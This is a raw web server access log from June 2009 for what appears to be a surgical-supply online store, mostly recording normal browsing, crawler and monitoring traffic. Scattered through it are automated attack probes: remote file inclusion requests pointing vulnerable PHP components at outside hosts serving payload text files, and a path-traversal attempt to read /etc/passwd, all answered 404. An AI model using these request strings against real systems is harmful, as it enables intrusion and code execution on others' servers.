70.61.119.142 - - [10/Jun/2009:08:03:41 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD HTTP/1.1" 200 31033 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:41 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:41 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:41 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:42 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L001F874943D2A700636E046+WSEQ(S0020):2+OKEY(A0190):001362570000O0095449+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:05 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:05 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:05 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:05 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:05 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:08 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:09 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:09 -0400] "GET /images/space.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
66.249.71.14 - - [10/Jun/2009:08:04:16 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
64.111.120.15 - - [10/Jun/2009:08:04:25 -0400] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.111.120.15 - - [10/Jun/2009:08:04:25 -0400] "GET /logs/access_log.Q109052800%20%20/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.111.120.15 - - [10/Jun/2009:08:04:25 -0400] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:08:04:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F8A474E42C700ED3E046+M37+ENG HTTP/1.1" 200 76258 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:49 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A474E42C700ED3E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:50 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A474E42C700ED3E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:50 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A474E42C700ED3E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:04:50 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A474E42C700ED3E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
77.221.152.82 - - [10/Jun/2009:08:05:00 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:08:05:00 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:08:05:00 -0400] "GET /modules/My_eGallery/index.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:08:05:01 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
206.225.92.50 - - [10/Jun/2009:08:06:15 -0400] "GET /logs///lostpasswd.php?env[include_prefix]=../../../../../../../../etc/passwd HTTP/1.0" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:08:06:15 -0400] "GET /logs//lostpasswd.php?env[include_prefix]=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 218 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
202.181.98.137 - - [10/Jun/2009:08:06:26 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mediask2.info/wb/Themes/babylon2/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
202.181.98.137 - - [10/Jun/2009:08:06:27 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mediask2.info/wb/Themes/babylon2/test.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
64.111.120.15 - - [10/Jun/2009:08:06:28 -0400] "GET /logs/access_log.Q109052800/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.111.120.15 - - [10/Jun/2009:08:06:29 -0400] "GET /logs/access_log.Q109050900/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:08:07:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.86 - - [10/Jun/2009:08:09:26 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.86 - - [10/Jun/2009:08:09:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.86 - - [10/Jun/2009:08:09:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.19.247.39 - - [10/Jun/2009:08:10:49 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:10:50 -0400] "GET ///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:10:50 -0400] "GET /logs///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.820"
217.73.161.62 - - [10/Jun/2009:08:11:06 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://team-x.ucoz.com/rfibot/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.73.161.62 - - [10/Jun/2009:08:11:08 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://team-x.ucoz.com/rfibot/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.73.161.62 - - [10/Jun/2009:08:11:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://team-x.ucoz.com/rfibot/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.249.71.14 - - [10/Jun/2009:08:11:12 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
172.16.1.79 - - [10/Jun/2009:08:11:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:11:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:11:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.73.161.62 - - [10/Jun/2009:08:12:12 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://team-x.ucoz.com/rfibot/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.73.161.62 - - [10/Jun/2009:08:12:12 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://team-x.ucoz.com/rfibot/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.73.161.62 - - [10/Jun/2009:08:12:12 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://team-x.ucoz.com/rfibot/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
172.16.1.180 - - [10/Jun/2009:08:12:13 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:12:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:12:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [10/Jun/2009:08:12:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.19.247.39 - - [10/Jun/2009:08:12:44 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:12:45 -0400] "GET ///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:12:45 -0400] "GET /logs///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.820"
172.16.1.79 - - [10/Jun/2009:08:12:52 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:12:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:12:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.19.247.39 - - [10/Jun/2009:08:12:54 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
222.231.1.113 - - [10/Jun/2009:08:13:25 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:08:13:25 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:08:13:25 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:08:13:25 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:08:13:25 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:08:13:25 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:08:13:28 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:13:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:13:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.231.1.113 - - [10/Jun/2009:08:13:32 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:08:13:32 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:08:14:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:14:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:14:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
190.54.28.195 - - [10/Jun/2009:08:14:38 -0400] "GET /logs/error_log.Q108102500/accounts/inc/include.php?language=0&lang_settings[0][1]=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:08:14:38 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:08:14:38 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
62.140.23.185 - - [10/Jun/2009:08:14:47 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
